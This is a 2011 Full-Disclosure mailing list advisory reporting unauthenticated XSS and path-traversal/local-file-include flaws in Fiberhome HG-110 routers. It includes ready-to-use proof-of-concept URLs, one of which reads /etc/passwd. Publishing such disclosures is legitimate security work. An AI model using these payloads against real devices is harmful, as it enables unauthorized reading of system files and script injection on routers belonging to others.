[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] Fiberhome HG-110 (adsl/router) vulnerabilities
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] Fiberhome HG-110 (adsl/router) vulnerabilities
- From: "Zerial." <fernando@xxxxxxxxxx>
- Date: Fri, 08 Apr 2011 10:30:36 -0300
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
I found two vulnerabilities on fiberhome hg-110 routers[1] and has not
been reported nor fixed.
XSS:
- -
http://192.168.1.1:8000/cgi-bin/webproc?getpage=%3Cscript%3Ealert%28this%29%3C/script%3E&var:menu=advanced&var:page=dns
Local File Include and Directory/Path Traversal:
- -
http://192.168.1.1:8000/cgi-bin/webproc?getpage=../../../../../../../../../../../../etc/passwd&var:menu=advanced&var:page=dns
URLs are accessible without authentication.
Device info:
- - HardwareVersion : HG110_BH_R1A
- - SoftwareVersion : HG110_BH_V1.6
- - Firmware Version : 1.0.0
This vulnerabilities can affect to other version and models of this vendor.
[1] http://www.minuevohogar.cl/wp-content/uploads/2011/03/Imagen-8.png
- --
Zerial
Seguridad Informatica
GNU/Linux User #382319
Blog: http://blog.zerial.org
Jabber: zerial@xxxxxxxxxxxx
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
iEYEARECAAYFAk2fDfwACgkQIP17Kywx9JSPbwCfXNQs42kMMPcUiw5107MnABJ0
PcUAniDsC0MZplJNquS0mXCtpidLk32r
=UZbN
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/